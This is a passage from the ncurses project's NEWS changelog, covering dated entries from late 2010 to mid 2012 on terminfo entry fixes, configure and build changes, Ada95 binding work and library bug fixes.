    the thick- and double-line extension (cf: 20091003).
  + modify handling of acs characters in PutAttrChar to avoid mapping an
    unmapped character to a space with A_ALTCHARSET set.
  + rewrite vt520 entry based on vt420 -TD

20120505
  + remove p6 (bold) from opus3n1+ for consistency -TD
  + remove acs stuff from env230 per clues in Ingres termcap -TD
  + modify env230 sgr/sgr0 to match other capabilities -TD
  + modify smacs/rmacs in bq300-8 to match sgr/sgr0 -TD
  + make sgr for dku7202 agree with other caps -TD
  + make sgr for ibmpc agree with other caps -TD
  + make sgr for tek4107 agree with other caps -TD
  + make sgr for ndr9500 agree with other caps -TD
  + make sgr for sco-ansi agree with other caps -TD
  + make sgr for d410 agree with other caps -TD
  + make sgr for d210 agree with other caps -TD
  + make sgr for d470c, d470c-7b agree with other caps -TD
  + remove redundant AC_DEFINE for NDEBUG versus Makefile definition.
  + fix a back-link in _nc_delink_entry(), which is needed if ncurses is
    configured with --enable-termcap and --disable-getcap.

20120428
  + fix some inconsistencies between vt320/vt420, e.g., cnorm/civis -TD
  + add eslok flag to dec+sl -TD
  + dec+sl applies to vt320 and up -TD
  + drop wsl width from xterm+sl -TD
  + reuse xterm+sl in putty and nsca-m -TD
  + add ansi+tabs to vt520 -TD
  + add ansi+enq to vt220-vt520 -TD
  + fix a compiler warning in example in ncurses-intro.doc (Paul Waring).
  + added paragraph in keyname manpage telling how extended capabilities
    are interpreted as key definitions.
  + modify tic's check of conflicting key definitions to include extended
    capability strings in addition to the existing check on predefined
    keys.

20120421
  + improve cleanup of temporary files in tic using atexit().
  + add msgr to vt420, similar DEC vtXXX entries -TD
  + add several missing vt420 capabilities from vt220 -TD
  + factor out ansi+pp from several entries -TD
  + change xterm+sl and xterm+sl-twm to include only the status-line
    capabilities and not "use=xterm", making them more generally useful
    as building-blocks -TD
  + add dec+sl building block, as example -TD

20120414
  + add XT to some terminfo entries to improve usefulness for other
    applications than screen, which would like to pretend that xterm's
    title is a status-line. -TD
  + change use-clauses in ansi-mtabs, hp2626, and hp2622 based on review
    of ordering and overrides -TD
  + add consistency check in tic for screen's "XT" capability.
  + add section in terminfo.src summarizing the user-defined capabilities
    used in that file -TD

20120407
  + fix an inconsistency between tic/infocmp "-x" option; tic omits all
    non-standard capabilities, while infocmp was ignoring only the user
    definable capabilities.
  + improve special case in tic parsing of description to allow it to be
    followed by terminfo capabilities.  Previously the description had to
    be the last field on an input line to allow tic to distinguish
    between termcap and terminfo format while still allowing commas to be
    embedded in the description.
  + correct variable name in gen_edit.sh which broke configurability of
    the --with-xterm-kbs option.
  + revert 2011-07-16 change to "linux" alias, return to "linux2.2" -TD
  + further amend 20110910 change, providing for configure-script
    override of the "linux" terminfo entry to install and changing the
    default for that to "linux2.2" (Debian #665959).

20120331
  + update Ada95/configure to use CF_DISABLE_ECHO (cf: 20120317).
  + correct order of use-clauses in st-256color -TD
  + modify configure script to look for gnatgcc if the Ada95 binding
    is built, in preference to the default gcc/cc (suggested by
    Nicolas Boulenguez).
  + modify configure script to ensure that the same -On option used for
    the C compiler in CFLAGS is used for ADAFLAGS rather than simply
    using "-O3" (suggested by Nicolas Boulenguez)

20120324
  + amend an old fix so that next_char() exits properly for empty files,
    e.g., from reading /dev/null (cf: 20080804).
  + modify tic so that it can read from the standard input, or from
    a character device.  Because tic uses seek's, this requires writing
    the data to a temporary file first (prompted by remark by Sven
    Joachim) (cf: 20000923).

20120317
  + correct a check made in lib_napms.c, so that terminfo applications
    can again use napms() (cf: 20110604).
  + add a note in tic.h regarding required casts for ABSENT_BOOLEAN
    (cf: 20040327).
  + correct scripting for --disable-echo option in test/configure.
  + amend check for missing c++ compiler to work when no error is
    reported, and no variables set (cf: 20021206).
  + add/use configure macro CF_DISABLE_ECHO.

20120310
  + fix some strict compiler warnings for abi6 and 64-bits.
  + use begin_va_copy/end_va_copy macros in lib_printw.c (cf: 20120303).
  + improve a limit-check in infocmp.c (Werner Fink):

20120303
  + minor tidying of terminfo.tail, clarify reason for limitation
    regarding mapping of \0 to \200
  + minor improvement to _nc_copy_termtype(), using memcpy to replace
    loops.
  + fix no-leaks checking in test/demo_termcap.c to account for multiple
    calls to setupterm().
  + modified the libgpm change to show previous load as a problem in the
    debug-trace.
  > merge some patches from OpenSUSE rpm (Werner Fink):
  + ncurses-5.7-printw.dif, fixes for varargs handling in lib_printw.c
  + ncurses-5.7-gpm.dif, do not dlopen libgpm if already loaded by
    runtime linker
  + ncurses-5.6-fallback.dif, do not free arrays and strings from static
    fallback entries

20120228
  + fix breakage in tic/infocmp from 20120225 (report by Werner Fink).

20120225
  + modify configure script to allow creating dll's for MinGW when
    cross-compiling.
  + add --enable-string-hacks option to control whether strlcat and
    strlcpy may be used.  The same issue applies to OpenBSD's warnings
    about snprintf, noting that this function is weakly standardized.
  + add configure checks for strlcat, strlcpy and snprintf, to help
    reduce bogus warnings with OpenBSD builds.
  + build-fix for OpenBSD 4.9 to supply consistent intptr_t declaration
    (cf: 20111231)
  + update config.guess, config.sub

20120218
  + correct CF_ETIP_DEFINES configure macro, making it exit properly on
    the first success (patch by Pierre Labastie).
  + improve configure macro CF_MKSTEMP by moving existence-check for
    mkstemp out of the AC_TRY_RUN, to help with cross-compiles.
  + improve configure macro CF_FUNC_POLL from luit changes to detect
    broken implementations, e.g., with Mac OS X.
  + add configure option --with-tparm-arg
  + build-fix for MinGW cross-compiling, so that make_hash does not
    depend on TTY definition (cf: 20111008).
20120211
  + make sgr for xterm-pcolor agree with other caps -TD
  + make sgr for att5425 agree with other caps -TD
  + make sgr for att630 agree with other caps -TD
  + make sgr for linux entries agree with other caps -TD
  + make sgr for tvi9065 agree with other caps -TD
  + make sgr for ncr260vt200an agree with other caps -TD
  + make sgr for ncr160vt100pp agree with other caps -TD
  + make sgr for ncr260vt300an agree with other caps -TD
  + make sgr for aaa-60-dec-rv, aaa+dec agree with other caps -TD
  + make sgr for cygwin, cygwinDBG agree with other caps -TD
  + add configure option --with-xterm-kbs to simplify configuration for
    Linux versus most other systems.

20120204
  + improved tic -D option, avoid making target directory and provide
    better diagnostics.

20120128
  + add mach-gnu (Debian #614316, patch by Samuel Thibault)
  + add mach-gnu-color, tweaks to mach-gnu terminfo -TD
  + make sgr for sun-color agree with smso -TD
  + make sgr for prism9 agree with other caps -TD
  + make sgr for icl6404 agree with other caps -TD
  + make sgr for ofcons agree with other caps -TD
  + make sgr for att5410v1, att4415, att620 agree with other caps -TD
  + make sgr for aaa-unk, aaa-rv agree with other caps -TD
  + make sgr for avt-ns agree with other caps -TD
  + amend fix intended to separate fixups for acsc to allow "tic -cv" to
    give verbose warnings (cf: 20110730).
  + modify misc/gen-edit.sh to make the location of the tabset directory
    consistent with misc/Makefile.in, i.e., using ${datadir}/tabset
    (Debian #653435, patch by Sven Joachim).

20120121
  + add --with-lib-prefix option to allow configuring for old/new flavors
    of OS/2 EMX.
  + modify check for gnat version to allow for year, as used in FreeBSD
    port.
  + modify check_existence() in db_iterator.c to simply check if the
    path is a directory or file, according to the need.
    Checking for
    directory size also gives no usable result with OS/2 (cf: 20120107).
  + support OS/2 kLIBC (patch by KO Myung-Han).

20120114
  + several improvements to test/movewindow.c (prompted by discussion on
    Linux Mint forum):
    + modify movement commands to make them continuous
    + rewrote the test for mvderwin
    + rewrote the test for recursive mvwin
  + split-out reusable CF_WITH_NCURSES_ETC macro in test/configure.in
  + updated configure macro CF_XOPEN_SOURCE, build-fixes for Mac OS X
    and OpenBSD.
  + regenerated html manpages.

20120107
  + various improvements for MinGW (Juergen Pfeifer):
    + modify stat() calls to ignore the st_size member
    + drop mk-dlls.sh script.
    + change recommended regular expression library.
    + modify rain.c to allow for threaded configuration.
    + modify tset.c to allow for case when size-change logic is not used.

20111231
  + modify toe's report when -a and -s options are combined, to add
    a column showing which entries belong to a given database.
  + add -s option to toe, to sort its output.
  + modify progs/toe.c, simplifying use of db-iterator results to use
    caching improvements from 20111001 and 20111126.
  + correct generation of pc-files when ticlib or termlib options are
    given to rename the corresponding tic- or tinfo-libraries (report
    by Sven Joachim).

20111224
  + document a portability issue with tput, i.e., that scripts which work
    with ncurses may fail in other implementations that do no parameter
    analysis.
  + add putty-sco entry -TD

20111217
  + review/fix places in manpages where --program-prefix configure option
    was not being used.
  + add -D option to infocmp, to show the database locations that it
    could use.
  + fix build for the special case where term-driver, ticlib and termlib
    are all enabled.
    The terminal driver depends on a few features in
    the base ncurses library, so tic's dependencies include both ncurses
    and termlib.
  + fix build for term-driver when --enable-wgetch-events option is
    enabled.
  + use <stdint.h> types to fix some questionable casts to void*.

20111210
  + modify configure script to check if thread library provides
    pthread_mutexattr_settype(), e.g., not provided by Solaris 2.6
  + modify configure script to suppress check to define _XOPEN_SOURCE
    for IRIX64, since its header files have a conflict versus
    _SGI_SOURCE.
  + modify configure script to add ".pc" files for tic- and
    tinfo-libraries, which were omitted in recent change (cf: 20111126).
  + fix inconsistent checks on $PKG_CONFIG variable in configure script.

20111203
  + modify configure-check for etip.h dependencies, supplying a temporary
    copy of ncurses_dll.h since it is a generated file (prompted by
    Debian #646977).
  + modify CF_CPP_PARAM_INIT "main" function to work with current C++.

20111126
  + correct database iterator's check for duplicate entries
    (cf: 20111001).
  + modify database iterator to ignore $TERMCAP when it is not an
    absolute pathname.
  + add -D option to tic, to show the database locations that it could
    use.
  + improve description of database locations in tic manpage.
  + modify the configure script to generate a list of the ".pc" files to
    generate, rather than deriving the list from the libraries which have
    been built (patch by Mike Frysinger).
  + use AC_CHECK_TOOLS in preference to AC_PATH_PROGS when searching for
    ncurses*-config, e.g., in Ada95/configure and test/configure (adapted
    from patch by Mike Frysinger).
20111119
  + remove obsolete/conflicting fallback definition for _POSIX_SOURCE
    from curses.priv.h, fixing a regression with IRIX64 and Tru64
    (cf: 20110416)
  + modify _nc_tic_dir() to ensure that its return-value is nonnull,
    i.e., the database iterator was not initialized.  This case is needed
    when tic is translating to termcap, rather than loading the
    database (cf: 20111001).

20111112
  + add pccon entries for OpenBSD console (Alexei Malinin).
  + build-fix for OpenBSD 4.9 with gcc 4.2.1, setting _XOPEN_SOURCE to
    600 to work around inconsistent ifdef'ing of wcstof between C and
    C++ header files.
  + modify capconvert script to accept more than exact match on "xterm",
    e.g., the "xterm-*" variants, to exclude from the conversion (patch
    by Robert Millan).
  + add -lc_r as alternative for -lpthread, allows build of threaded code
    in older FreeBSD machines.
  + build-fix for MirBSD, which fails when either _XOPEN_SOURCE or
    _POSIX_SOURCE are defined.
  + fix a typo in misc/Makefile.in, used in uninstalling pc-files.

20111030
  + modify make_db_path() to allow creating "terminfo.db" in the same
    directory as an existing "terminfo" directory.  This fixes a case
    where switching between hashed/filesystem databases would cause the
    new hashed database to be installed in the next best location -
    root's home directory.
  + add variable cf_cv_prog_gnat_correct to those passed to
    config.status, fixing a problem with Ada95 builds (cf: 20111022).
  + change feature test from _XPG5 to _XOPEN_SOURCE in two places, to
    accommodate broken implementations for _XPG6.
  + eliminate usage of NULL symbol from etip.h, to reduce header
    interdependencies.
  + add configure check to decide when to add _XOPEN_SOURCE define to
    compiler options, i.e., for Solaris 10 and later (cf: 20100403).
    This is a workaround for gcc 4.6, which fails to build the c++
    binding if that symbol is defined by the application, due to
    incorrectly combining the corresponding feature test macros
    (report by Peter Kruse).

20111022
  + correct logic for discarding mouse events, retaining the partial
    events used to build up click, double-click, etc, until needed
    (cf: 20110917).
  + fix configure script to avoid creating unused Ada95 makefile when
    gnat does not work.
  + cleanup width-related gcc 3.4.3 warnings for 64-bit platform, for the
    internal functions of libncurses.  The external interface of course
    uses bool, which still produces these warnings.

20111015
  + improve description of --disable-tic-depends option to make it
    clear that it may be useful whether or not the --with-termlib
    option is also given (report by Sven Joachim).
  + amend termcap equivalent for set_pglen_inch to use the X/Open
    "YI" rather than the obsolete Solaris 2.5 "sL" (cf: 990109).
  + improve manpage for tgetent differences from termcap library.

20111008
  + moved static data from db_iterator.c to lib_data.c
  + modify db_iterator.c for memory-leak checking, fix one leak.
  + modify misc/gen-pkgconfig.in to use Requires.private for the parts
    of ncurses rather than Requires, as well as Libs.private for the
    other library dependencies (prompted by Debian #644728).

20111001
  + modify tic "-K" option to only set the strict-flag rather than force
    source-output.  That allows the same flag to control the parser for
    input and output of termcap source.
  + modify _nc_getent() to ignore backslash at the end of a comment line,
    making it consistent with ncurses' parser.
  + restore a special-case check for directory needed to make termcap
    text files load as if they were databases (cf: 20110924).
  + modify tic's resolution/collision checking to attempt to remove the
    conflicting alias from the second entry in the pair, which is
    normally following in the source file.  Also improved the warning
    message to make it simpler to see which alias is the problem.
  + improve performance of the database iterator by caching search-list.

20110925
  + add a missing "else" in changes to _nc_read_tic_entry().

20110924
  + modify _nc_read_tic_entry() so that hashed-database is checked before
    filesystem.
  + updated CF_CURSES_LIBS check in test/configure script.
  + modify configure script and makefiles to split TIC_ARGS and
    TINFO_ARGS into pieces corresponding to LDFLAGS and LIBS variables,
    to help separate searches for tic- and tinfo-libraries (patch by Nick
    Alcock aka "Nix").
  + build-fix for lib_mouse.c changes (cf: 20110917).

20110917
  + fix compiler warning for clang 2.9
  + improve merging of mouse events (integrated patch by Damien
    Guibouret).
  + correct mask-check used in lib_mouse for wheel mouse buttons 4/5
    (patch by Damien Guibouret).

20110910
  + modify misc/gen_edit.sh to select a "linux" entry which works with
    the current kernel rather than assuming it is always "linux3.0"
    (cf: 20110716).
  + revert a change to getmouse() which had the undesirable side-effect
    of suppressing button-release events (report by Damien Guibouret,
    cf: 20100102).
  + add xterm+kbs fragment from xterm #272 -TD
  + add configure option --with-pkg-config-libdir to provide control over
    the actual directory into which pc-files are installed, do not use
    the pkg-config environment variables (discussion with Frederic L W
    Meunier).
  + add link to mailing-list archive in announce.html.in, as done in
    FAQ (prompted by question by Andrius Bentkus).
  + improve manpage install by adjusting the "#include" examples to
    show the ncurses-subdirectory used when --disable-overwrite option
    is used.
  + install an alias for "curses" to the ncurses manpage, tied to the
    --with-curses-h configure option (suggested by Reuben Thomas).

20110903
  + propagate error-returns from wresize, i.e., the internal
    increase_size and decrease_size functions through resize_term (report
    by Tim van der Molen, cf: 20020713).
  + fix typo in tset manpage (patch by Sven Joachim).

20110820
  + add a check to ensure that termcap files which might have "^?" do
    not use the terminfo interpretation as "\177".
  + minor cleanup of X-terminal emulator section of terminfo.src -TD
  + add terminator entry -TD
  + add simpleterm entry -TD
  + improve wattr_get macros by ensuring that if the window pointer is
    null, then the attribute and color values returned will be zero
    (cf: 20110528).

20110813
  + add substitution for $RPATH_LIST to misc/ncurses-config.in
  + improve performance of tic with hashed-database by caching the
    database connection, using atexit() to cleanup.
  + modify treatment of 2-character aliases at the beginning of termcap
    entries so they are not counted in use-resolution, since these are
    guaranteed to be unique.  Also ignore these aliases when reporting
    the primary name of the entry (cf: 20040501)
  + double-check gn (generic) flag in terminal descriptions to
    accommodate old/buggy termcap databases which misused that feature.
  + minor fixes to _nc_tgetent(), ensure buffer is initialized even on
    error-return.

20110807
  + improve rpath fix from 20110730 by ensuring that the new $RPATH_LIST
    variable is defined in the makefiles which use it.
  + build-fix for DragonFlyBSD's pkgsrc in test/configure script.
  + build-fixes for NetBSD 5.1 with termcap support enabled.
  + corrected k9 in dg460-ansi, add other features based on manuals -TD
  + improve trimming of whitespace at the end of terminfo/termcap output
    from tic/infocmp.
  + when writing termcap source, ensure that colons in the description
    field are translated to a non-delimiter, i.e., "=".
  + add "-0" option to tic/infocmp, to make the termcap/terminfo source
    use a single line.
  + add a null-pointer check when handling the $CC variable.

20110730
  + modify configure script and makefiles in c++ and progs to allow the
    directory used for rpath option to be overridden, e.g., to work
    around updates to the variables used by tic during an install.
  + add -K option to tic/infocmp, to provide stricter BSD-compatibility
    for termcap output.
  + add _nc_strict_bsd variable in tic library which controls the
    "strict" BSD termcap compatibility from 20110723, plus these
    features:
    + allow escapes such as "\8" and "\9" when reading termcap
    + disallow "\a", "\e", "\l", "\s" and "\:" escapes when reading
      termcap files, passing through "a", "e", etc.
    + expand "\:" as "\072" on output.
  + modify _nc_get_token() to reset the token's string value in case
    there is a string-typed token lacking the "=" marker.
  + fix a few memory leaks in _nc_tgetent.
  + fix a few places where reading from a termcap file could refer to
    freed memory.
  + add an overflow check when converting terminfo/termcap numeric
    values, since terminfo stores those in a short, and they must be
    positive.
  + correct internal variables used for translating to termcap "%>"
    feature, and translating from termcap %B to terminfo, needed by
    tctest (cf: 19991211).
  + amend a minor fix to acsc when loading a termcap file to separate it
    from warnings needed for tic (cf: 20040710)
  + modify logic in _nc_read_entry() and _nc_read_tic_entry() to allow
    a termcap file to be handled via TERMINFO_DIRS.
  + modify _nc_infotocap() to include non-mandatory padding when
    translating to termcap.
  + modify _nc_read_termcap_entry(), passing a flag in the case where
    getcap is used, to reduce interactive warning messages.

20110723
  + add a check in start_color() to limit color-pairs to 256 when
    extended colors are not supported (patch by David Benjamin).
  + modify setcchar to omit no-longer-needed OR'ing of color pair in
    the SetAttr() macro (patch by David Benjamin).
  + add kich1 to sun terminfo entry (Yuri Pankov)
  + use bold rather than reverse for smso in sun-color terminfo entry
    (Yuri Pankov).
  + improve generation of termcap using tic/infocmp -C option, e.g.,
    to correspond with 4.2BSD (prompted by discussion with Yuri Pankov
    regarding Schilling's test program):
    + translate %02 and %03 to %2 and %3 respectively.
    + suppress string capabilities which use %s, not supported by tgoto
    + use \040 rather than \s
    + expand null characters as \200 rather than \0
  + modify configure script to support shared libraries for DragonFlyBSD.

20110716
  + replace an assert() in _nc_Free_Argument() with a regular null
    pointer check (report/analysis by Franjo Ivancic).
  + modify configure --enable-pc-files option to take into account the
    PKG_CONFIG_PATH variable (report by Frederic L W Meunier).
  + add/use xterm+tmux chunk from xterm #271 -TD
  + resync xterm-new entry from xterm #271 -TD
  + add E3 extended capability to linux-basic (Miroslav Lichvar)
  + add linux2.2, linux2.6, linux3.0 entries to give context for E3 -TD
  + add SI/SO change to linux2.6 entry (Debian #515609) -TD
  + fix inconsistent tabset path in pcmw (Todd C. Miller).
  + remove a backslash which continued comment, obscuring altos3
    definition with OpenBSD toolset (Nicholas Marriott).
20110702
  + add workaround from xterm #271 changes to ensure that compiler flags
    are not used in the $CC variable.
  + improve support for shared libraries, tested with AIX 5.3, 6.1 and
    7.1 with both gcc 4.2.4 and cc.
  + modify configure checks for AIX to include release 7.x
  + add loader flags/libraries to libtool options so that dynamic loading
    works properly, adapted from ncurses-5.7-ldflags-with-libtool.patch
    at gentoo prefix repository (patch by Michael Haubenwallner).

20110626
  + move include of nc_termios.h out of term_entry.h, since the latter
    is installed, e.g., for tack while the former is not (report by
    Sven Joachim).

20110625
  + improve cleanup() function in lib_tstp.c, using _exit() rather than
    exit() and checking for SIGTERM rather than SIGQUIT (prompted by
    comments forwarded by Nicholas Marriott).
  + reduce name pollution from term.h, moving fallback #define's for
    tcgetattr(), etc., to new private header nc_termios.h (report by
    Sergio NNX).
  + two minor fixes for tracing (patch by Vassili Courzakis).
  + improve trace initialization by starting it in use_env() and
    ripoffline().
  + review old email, add details for some changelog entries.

20110611
  + update minix entry to minix 3.2 (Thomas Cort).
  + fix a strict compiler warning in change to wattr_get (cf: 20110528).

20110604
  + fixes for MirBSD port:
    + set default prefix to /usr.
    + add support for shared libraries in configure script.
    + use S_ISREG and S_ISDIR consistently, with fallback definitions.
    + add a few more checks based on ncurses/link_test.
  + modify MKlib_gen.sh to handle sp-funcs renaming of NCURSES_OUTC type.

20110528
  + add case to CF_SHARED_OPTS for Interix (patch by Markus Duft).
  + used ncurses/link_test to check for behavior when the terminal has
    not been initialized and when an application passes null pointers
    to the library.  Added checks to cover this (prompted by Redhat
    #707344).
  + modify MKlib_gen.sh to make its main() function call each function
    with zero parameters, to help find inconsistent checking for null
    pointers, etc.

20110521
  + fix warnings from clang 2.7 "--analyze"

20110514
  + compiler-warning fixes in panel and progs.
  + modify CF_PKG_CONFIG macro, from changes to tin -TD
  + modify CF_CURSES_FUNCS configure macro, used in test directory
    configure script:
    + work around (non-optimizer) bug in gcc 4.2.1 which caused
      test-expression to be omitted from executable.
    + force the linker to see a link-time expression of a symbol, to
      help work around weak-symbol issues.

20110507
  + update discussion of MKfallback.sh script in INSTALL; normally the
    script is used automatically via the configured makefiles.  However
    there are still occasions when it might be used directly by packagers
    (report by Gunter Schaffler).
  + modify misc/ncurses-config.in to omit the "-L" option from the
    "--libs" output if the library directory is /usr/lib.
  + change order of tests for curses.h versus ncurses.h headers in the
    configure scripts for Ada95 and test-directories, to look for
    ncurses.h, from fixes to tin -TD
  + modify ncurses/tinfo/access.c to account for Tandem's root uid
    (report by Joachim Schmitz).

20110430
  + modify rules in Ada95/src/Makefile.in to ensure that the PIC option
    is not used when building a static library (report by Nicolas
    Boulenguez):
  + Ada95 build-fix for big-endian architectures such as sparc.
    This undoes one of the fixes from 20110319, which added an "Unused"
    member to representation clauses, replacing that with pragmas to
    suppress warnings about unused bits (patch by Nicolas Boulenguez):

20110423
  + add check in test/configure for use_window, use_screen.
  + add configure-checks for getopt's variables, which may be declared
    as different types on some Unix systems.
  + add check in test/configure for some legacy curses types of the
    function pointer passed to tputs().
  + modify init_pair() to accept -1's for color value after
    assume_default_colors() has been called (Debian #337095).
  + modify test/background.c, adding command-line options to demonstrate
    assume_default_colors() and use_default_colors().

20110416
  + modify configure script/source-code to only define _POSIX_SOURCE if
    the checks for sigaction and/or termios fail, and if _POSIX_C_SOURCE
    and _XOPEN_SOURCE are undefined (report by Valentin Ochs).
  + update config.guess, config.sub

20110409
  + fixes to build c++ binding with clang 3.0 (patch by Alexander
    Kolesen).
  + add check for unctrl.h in test/configure, to work around breakage in
    some ncurses packages.
  + add "--disable-widec" option to test/configure script.
  + add "--with-curses-colr" and "--with-curses-5lib" options to the
    test/configure script to address testing with very old machines.

20110404 5.9 release for upload to

20110402
  + various build-fixes for the rpm/dpkg scripts.
  + add "--enable-rpath-link" option to Ada95/configure, to allow
    packages to suppress the rpath feature which is normally used for
    the in-tree build of sample programs.
  + corrected definition of libdir variable in Ada95/src/Makefile.in,
    needed for rpm script.
    + add "--with-shared" option to Ada95/configure script, to allow
      making the C-language parts of the binding use appropriate compiler
      options if building a shared library with gnat.

20110329
    > portability fixes for Ada95 binding:
    + add configure check to ensure that SIGINT works with gnat.  This is
      needed for the "rain" sample program.  If SIGINT does not work, omit
      that sample program.
    + correct typo in check of $PKG_CONFIG variable in Ada95/configure
    + add ncurses_compat.c, to supply functions used in the Ada95 binding
      which were added in 5.7 and later.
    + modify sed expression in CF_NCURSES_ADDON to eliminate a dependency
      upon GNU sed.

20110326
    + add special check in Ada95/configure script for ncurses6 reentrant
      code.
    + regen Ada html documentation.
    + build-fix for Ada shared libraries versus the varargs workaround.
    + add rpm and dpkg scripts for Ada95 and test directories, for test
      builds.
    + update test/configure macros CF_CURSES_LIBS, CF_XOPEN_SOURCE and
      CF_X_ATHENA_LIBS.
    + add configure check to determine if gnat's project feature supports
      libraries, i.e., collections of .ali files.
    + make all dereferences in Ada95 samples explicit.
    + fix typo in comment in lib_add_wch.c (patch by Petr Pavlu).
    + add configure check for, ifdef's for math.h which is in a separate
      package on Solaris and potentially not installed (report by Petr
      Pavlu).
    > fixes for Ada95 binding (Nicolas Boulenguez):
    + improve type-checking in Ada95 by eliminating a few warning-suppress
      pragmas.
    + suppress unreferenced warnings.
    + make all dereferences in binding explicit.

20110319
    + regen Ada html documentation.
    + change order of -I options from ncurses*-config script when the
      --disable-overwrite option was used, so that the subdirectory include
      is listed first.
    + modify the make-tar.sh scripts to add a MANIFEST and NEWS file.
    + modify configure script to provide value for HTML_DIR in
      Ada95/gen/Makefile.in, which depends on whether the Ada95 binding is
      distributed separately (report by Nicolas Boulenguez).
    + modify configure script to add "-g" and/or "-O3" to ADAFLAGS if the
      CFLAGS for the build has these options.
    + amend change from 20070324, to not add 1 to the result of getmaxx
      and getmaxy in the Ada binding (report by Nicolas Boulenguez for
      thread in comp.lang.ada).
    + build-fix Ada95/samples for gnat 4.5
    + spelling fixes for Ada95/samples/explain.txt
    > fixes for Ada95 binding (Nicolas Boulenguez):
    + add item in Trace_Attribute_Set corresponding to TRACE_ATTRS.
    + add workaround for binding to set_field_type(), which uses varargs.
      The original binding from 990220 relied on the prevalent
      implementation of varargs which did not support or need va_copy().
    + add dependency on gen/Makefile.in needed for *-panels.ads
    + add Library_Options to library.gpr
    + add Languages to library.gpr, for gprbuild

20110307
    + revert changes to limit-checks from 20110122 (Debian #616711).
    > minor type-cleanup of Ada95 binding (Nicolas Boulenguez):
    + corrected a minor sign error in a field of Low_Level_Field_Type, to
      conform to form.h.
    + replaced C_Int by Curses_Bool as return type for some callbacks, see
      fieldtype(3FORM).
    + modify samples/sample-explain.adb to provide explicit message when
      explain.txt is not found.

20110305
    + improve makefiles for Ada95 tree (patch by Nicolas Boulenguez).
    + fix an off-by-one error in _nc_slk_initialize() from 20100605 fixes
      for compiler warnings (report by Nicolas Boulenguez).
    + modify Ada95/gen/gen.c to declare unused bits in generated layouts,
      needed to compile when chtype is 64-bits using gnat 4.4.5

20110226 5.8 release for upload to

20110226
    + update release notes, for 5.8.
    + regenerated html manpages.
    + change open() in _nc_read_file_entry() to fopen() for consistency
      with write_file().
    + modify misc/run_tic.in to create parent directory, in case this is
      a new install of hashed database.
    + fix typo in Ada95/mk-1st.awk which causes error with original awk.

20110220
    + configure script rpath fixes from xterm #269.
    + workaround for cygwin's non-functional features.h, to force ncurses'
      configure script to define _XOPEN_SOURCE_EXTENDED when building
      wide-character configuration.
    + build-fix in run_tic.sh for OS/2 EMX install
    + add cons25-debian entry (patch by Brian M Carlson, Debian #607662).

20110212
    + regenerated html manpages.
    + use _tracef() in show_where() function of tic, to work correctly with
      special case of trace configuration.

20110205
    + add xterm-utf8 entry as a demo of the U8 feature -TD
    + add U8 feature to denote entries for terminal emulators which do not
      support VT100 SI/SO when processing UTF-8 encoding -TD
    + improve the NCURSES_NO_UTF8_ACS feature by adding a check for an
      extended terminfo capability U8 (prompted by mailing list
      discussion).

20110122
    + start documenting interface changes for upcoming 5.8 release.
    + correct limit-checks in derwin().
    + correct limit-checks in newwin(), to ensure that windows have nonzero
      size (report by Garrett Cooper).
    + fix a missing "weak" declaration for pthread_kill (patch by Nicholas
      Alcock).
    + improve documentation of KEY_ENTER in curs_getch.3x manpage (prompted
      by discussion with Kevin Martin).
20110115
    + modify Ada95/configure script to make the --with-curses-dir option
      work without requiring the --with-ncurses option.
    + modify test programs to allow them to be built with NetBSD curses.
    + document thick- and double-line symbols in curs_add_wch.3x manpage.
    + document WACS_xxx constants in curs_add_wch.3x manpage.
    + fix some warnings for clang 2.6 "--analyze"
    + modify Ada95 makefiles to make html-documentation with the project
      file configuration if that is used.
    + update config.guess, config.sub

20110108
    + regenerated html manpages.
    + minor fixes to enable lint when trace is not enabled, e.g., with
      clang --analyze.
    + fix typo in man/default_colors.3x (patch by Tim van der Molen).
    + update ncurses/llib-lncurses*

20110101
    + fix remaining strict compiler warnings in ncurses library ABI=5,
      except those dealing with function pointers, etc.

20101225
    + modify nc_tparm.h, adding guards against repeated inclusion, and
      allowing TPARM_ARG to be overridden.
    + fix some strict compiler warnings in ncurses library.

20101211
    + suppress ncv in screen entry, allowing underline (patch by Alejandro
      R Sedeno).
    + also suppress ncv in konsole-base -TD
    + fixes in wins_nwstr() and related functions to ensure that special
      characters, i.e., control characters are handled properly with the
      wide-character configuration.
    + correct a comparison in wins_nwstr() (Redhat #661506).
    + correct help-messages in some of the test-programs, which still
      referred to quitting with 'q'.

20101204
    + add special case to _nc_infotocap() to recognize the setaf/setab
      strings from xterm+256color and xterm+88color, and provide a reduced
      version which works with termcap.
    + remove obsolete emacs "Local Variables" section from documentation
      (request by Sven Joachim).
    + update doc/html/index.html to include NCURSES-Programming-HOWTO.html
      (report by Sven Joachim).

20101128
    + modify test/configure and test/Makefile.in to handle this special
      case of building within a build-tree (Debian #34182):
        mkdir -p build && cd build && ../test/configure && make

20101127
    + miscellaneous build-fixes for Ada95 and test-directories when built
      out-of-tree.
    + use VPATH in makefiles to simplify out-of-tree builds (Debian #34182).
    + fix typo in rmso for tek4106 entry -Goran Weinholt

20101120
    + improve checks in test/configure for X libraries, from xterm #267
      changes.
    + modify test/configure to allow it to use the build-tree's libraries
      e.g., when using that to configure the test-programs without the
      rpath feature (request by Sven Joachim).
    + repurpose "gnome" terminfo entries as "vte", retaining "gnome" items
      for compatibility, but generally deprecating those since the VTE
      library is what actually defines the behavior of "gnome", etc.,
      since 2003 -TD

20101113
    + compiler warning fixes for test programs.
    + various build-fixes for test-programs with pdcurses.
    + updated configure checks for X packages in test/configure from xterm
      #267 changes.
    + add configure check to gnatmake, to accommodate cygwin.

20101106
    + correct list of sub-directories needed in Ada95 tree for building as
      a separate package.
    + modify scripts in test-directory to improve builds as a separate
      package.

20101023
    + correct parsing of relative tab-stops in tabs program (report by
      Philip Ganchev).
    + adjust configure script so that "t" is not added to library suffix
      when weak-symbols are used, allowing the pthread configuration to
      more closely match the non-thread naming (report by Werner Fink).
    + modify configure check for tic program, used for fallbacks, to a
      warning if not found.  This makes it simpler to use additional
      scripts to bootstrap the fallbacks code using tic from the build
      tree (report by Werner Fink).
    + fix several places in configure script using ${variable-value} form.
    + modify configure macro CF_LDFLAGS_STATIC to accommodate some loaders
      which do not support selectively linking against static libraries
      (report by John P. Hartmann)
    + fix an unescaped dash in man/tset.1 (report by Sven Joachim).

20101009
    + correct comparison used for setting 16-colors in linux-16color
      entry (Novell #644831) -TD
    + improve linux-16color entry, using "dim" for color-8 which makes it
      gray rather than black like color-0 -TD
    + drop misc/ncu-indent and misc/jpf-indent; they are provided by an
      external package "cindent".

20101002
    + improve linkages in html manpages, adding references to the newer
      pages, e.g., *_variables, curs_sp_funcs, curs_threads.
